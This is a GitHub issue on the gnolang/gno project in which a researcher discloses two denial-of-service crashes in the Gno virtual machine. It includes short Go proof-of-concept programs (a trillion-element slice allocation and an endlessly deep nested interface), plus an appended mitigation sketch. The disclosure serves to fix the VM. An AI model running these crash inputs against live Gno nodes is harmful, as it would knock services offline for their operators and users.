gnolang / gno

Gno: An interpreted, stack-based Go virtual machine to build succinct and composable apps + Gno.land: a blockchain for timeless code and fair open-source.
https://gno.land/

Two critical VM issues (denial of service attacks) #2738

Open bbarwik opened 1 month ago

bbarwik commented 1 month ago

Two critical VM issues (denial of service attacks)

Hey everyone, I am a Web3 cybersecurity researcher working for Hacken, specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin, where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.

Critical issues

  1. Crashing VM due to out-of-memory error by allocating a huge slice:

    package main
    func main() {
        buffer := make([]int, 1_000_000_000_000)
        buffer[1] = 1
    }

  2. Crashing VM by creating a very deep structure which is very CPU-intensive to process:

    func init() {
        var x interface{}
        for {
            x = [1]interface{}{x}
        }
    }

or alternatively:

    package main
    func main() {
        var x interface{}
        for i := 0; i < 10000; i++ {
            x = [1]interface{}{x}
        }
        for i := 0; i < 10000; i++ {
            println(x)
        }
    }

I used the following test to reproduce these issues: crash_test.go.zip. You should put it in gno.land/pkg/sdk/vm and run it there with go test -v -run TestVMCrash.

Next steps

I highly recommend introducing fuzzing in your project and undergoing a full audit before launching your product.

Feel free to contact me here or by sending an email to b.barwikowski@hacken.io if you need any help.
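
A mitigation sketch for the two issue classes reported above, added here as an example; it is not part of the original post and is not Gno's own code. The names `Allocator`, `MakeInts`, `Describe` and both limits are hypothetical: the first guard charges a slice allocation against a byte budget before `make` runs, the second walks nested `[1]interface{}` values iteratively and stops at a fixed depth.

```go
package main

import (
	"errors"
	"fmt"
)

// Assumed limits for illustration; a real VM would derive them from its gas/memory model.
const maxAllocBytes, maxDepth = 64 << 20, 64

var ErrAllocLimit = errors.New("allocation exceeds budget")

// Allocator tracks the bytes already charged to one execution.
type Allocator struct{ used uint64 }

// MakeInts is a guarded make([]int, n): the size is checked before memory is reserved.
func (a *Allocator) MakeInts(n uint64) ([]int, error) {
	const elemSize = 8 // size of int on a 64-bit host (assumption)
	// Dividing the remaining budget avoids overflow in n*elemSize.
	if n > (maxAllocBytes-a.used)/elemSize {
		return nil, ErrAllocLimit
	}
	a.used += n * elemSize
	return make([]int, n), nil
}

// Describe follows nested [1]interface{} values with a loop instead of
// recursion and gives up at maxDepth, so work per call stays bounded.
func Describe(v interface{}) string {
	for depth := 0; ; depth++ {
		arr, ok := v.([1]interface{})
		if !ok {
			return fmt.Sprintf("depth=%d leaf=%v", depth, v)
		}
		if depth == maxDepth {
			return fmt.Sprintf("depth>=%d (truncated)", maxDepth)
		}
		v = arr[0]
	}
}

func main() {
	a := &Allocator{}
	_, err := a.MakeInts(1_000_000_000_000) // size from the first report
	fmt.Println(err)
	var x interface{}
	for i := 0; i < 10000; i++ { // nesting from the second report
		x = [1]interface{}{x}
	}
	fmt.Println(Describe(x))
}
```
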

deelawn commented 4 weeks ago

I'll take a stab at solving the first issue listed here

  1. Crashing VM due to out-of-memory error by allocating a huge slice: